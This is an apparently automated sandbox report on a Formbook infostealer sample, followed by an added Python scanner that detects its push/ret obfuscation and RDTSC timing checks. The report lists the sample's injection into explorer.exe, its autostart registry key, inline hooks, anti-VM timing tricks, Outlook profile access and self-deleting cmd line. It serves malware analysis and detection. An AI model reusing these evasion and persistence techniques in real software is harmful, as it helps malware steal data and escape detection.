          Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/2
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00421830 GetLastError,FormatMessageA,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00408E98 GetDiskFreeSpaceA,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_004146E8 FindResourceA,
          Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Roaming\55R0B44T
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
          Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.ini
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: R6o4qCis6s.exe | Virustotal: Detection: 77%
          Source: R6o4qCis6s.exe | ReversingLabs: Detection: 79%
          Source: unknown | Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: C:\Windows\SysWOW64\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Windows\SysWOW64\explorer.exe | File written: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.ini
          Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: explorer.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256223988.00000000009D0000.00000040.00000001.sdmp, explorer.exe, 00000005.00000002.483146175.000000000491F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: R6o4qCis6s.exe, explorer.exe
          Source: Binary string: explorer.pdb source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Unpacked PE file: 1.2.R6o4qCis6s.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00444B40 push 00444BCDh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00482040 push 00482066h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00472060 push 0047208Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00482008 push 00482034h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00474134 push 00474160h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0047C274 push 0047C2A0h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0046C22C push 0046C258h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0047C2C0 push 0047C2ECh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_004722F4 push 00472320h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0042A2B4 push 0042A2E0h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0040C340 push 0040C78Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_004703C0 push 004703ECh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0041E45C push 0041E502h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0046A48C push 0046A4B8h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00472498 push 004724C4h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00428550 push 0042857Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0043A524 push ecx; mov dword ptr [esp], ecx
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0046C5F4 push 0046C620h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_004705F4 push 00470620h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0047267C push 004726A8h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0040C610 push 0040C78Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_004066CA push 0040671Dh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_004066CC push 0040671Dh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_004286E8 push 00428714h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0047A7F8 push 0047A824h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0040C78E push 0040C7FFh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0040C790 push 0040C7FFh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0047A798 push 0047A7C4h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0041E860 push 0041E88Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0040C86E push 0040C89Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0040C870 push 0040C89Ch; ret

          Boot Survival:

          Creates an undocumented autostart registry key
          Source: C:\Windows\SysWOW64\explorer.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 9RFXABXP

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE2
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0045880C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00428920 IsIconic,GetWindowPlacement,GetWindowRect,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0043ED90 IsIconic,GetCapture,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0043F638 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00455888 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Contains functionality to detect sleep reduction / modifications
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | Code function: 0_2_00433C54
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | RDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\R6o4qCis6s.exe | RDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 00000000002298D4 second address: 00000000002298DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 0000000000229B3E second address: 0000000000229B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
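          Two of the behaviours listed above are plain byte patterns that can be found statically once the payload has been dumped: the `push imm32; ret` sequences under Data Obfuscation (each one is an unconditional jump to the pushed address, which breaks naive call-graph recovery), and the back-to-back `rdtsc ... rdtsc` timing check under Malware Analysis System Evasion. The scanner below is an example added by the editor; it is not part of this report or of the sandbox. The code blob it scans is constructed from the instructions the report prints (the push/ret of function 0_2_00444B40 with target 00444BCDh, and the rdtsc / xor ecx,ecx / add ecx,eax / rdtsc sequence), not dumped from the sample. The report gives mnemonics, not bytes, so the pattern accepts both legal encodings of the two middle instructions (31 C9 or 33 C9, 01 C1 or 03 C8). The image bounds 0x00400000-0x00490000 are an assumption used only to reject byte coincidences whose push target lies outside the module.

```python
"""Static scanner for two patterns the sandbox report lists: push imm32; ret
redirections and paired rdtsc timing checks.  Added example, not report code."""
import re
import struct
from typing import Dict, List, Tuple

# 68 <imm32 little-endian> C3  ==  push imm32; ret  (an unconditional jump to imm32)
PUSH_RET = re.compile(rb"\x68(?P<target>.{4})\xc3", re.DOTALL)

# rdtsc; xor ecx,ecx; add ecx,eax; rdtsc at offsets 0x00/0x02/0x04/0x06, as in the
# report.  Both legal encodings of the two middle instructions are accepted.
RDTSC_PAIR = re.compile(rb"\x0f\x31(?:\x31\xc9|\x33\xc9)(?:\x01\xc1|\x03\xc8)\x0f\x31")


def find_push_ret_jumps(code: bytes, base_va: int, image_lo: int, image_hi: int) -> List[Tuple[int, int]]:
    """(va_of_push, jump_target) for every push imm32; ret whose target is inside the image.
    The in-image filter drops data bytes that merely look like 68 .. .. .. .. C3."""
    hits = []
    for m in PUSH_RET.finditer(code):
        target = struct.unpack("<I", m.group("target"))[0]
        if image_lo <= target < image_hi:
            hits.append((base_va + m.start(), target))
    return hits


def find_rdtsc_checks(code: bytes, base_va: int) -> List[Tuple[int, int]]:
    """(va_of_first_rdtsc, va_of_second_rdtsc) for each paired timing check; in this
    sequence the second rdtsc is always 6 bytes after the first."""
    return [(base_va + m.start(), base_va + m.start() + 6) for m in RDTSC_PAIR.finditer(code)]


def scan(code: bytes, base_va: int, image_lo: int, image_hi: int) -> Dict[str, List[Tuple[int, int]]]:
    """Run both detectors over one dumped region and key the hits by pattern name."""
    return {
        "push_ret_jump": find_push_ret_jumps(code, base_va, image_lo, image_hi),
        "rdtsc_check": find_rdtsc_checks(code, base_va),
    }


# Constructed test blob (assumption: not bytes dumped from the sample).  It is laid
# out as if it sat at the report's function 0_2_00444B40 inside an image assumed to
# span 0x00400000-0x00490000.
IMAGE_LO, IMAGE_HI = 0x00400000, 0x00490000
SAMPLE_VA = 0x00444B40
SAMPLE_CODE = (
    b"\x55\x8b\xec"                                        # push ebp; mov ebp,esp (filler)
    + b"\x68" + struct.pack("<I", 0x00444BCD) + b"\xc3"    # push 00444BCDh; ret  (from the report)
    + b"\x90\x90"                                          # nop; nop
    + b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"                  # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    + b"\x68" + struct.pack("<I", 0xDEADBEEF) + b"\xc3"    # decoy: target outside the image, ignored
)

if __name__ == "__main__":
    for kind, hits in scan(SAMPLE_CODE, SAMPLE_VA, IMAGE_LO, IMAGE_HI).items():
        for src, dst in hits:
            print(f"{kind}: 0x{src:08X} -> 0x{dst:08X}")
```

          To use it on real data, read one of the dumps listed above (for instance 1.2.R6o4qCis6s.exe.400000.0.unpack) and pass its load address as base_va; restricting the scan to executable sections and keeping the in-image target filter removes most false positives from data that happens to contain 68 .. .. .. .. C3.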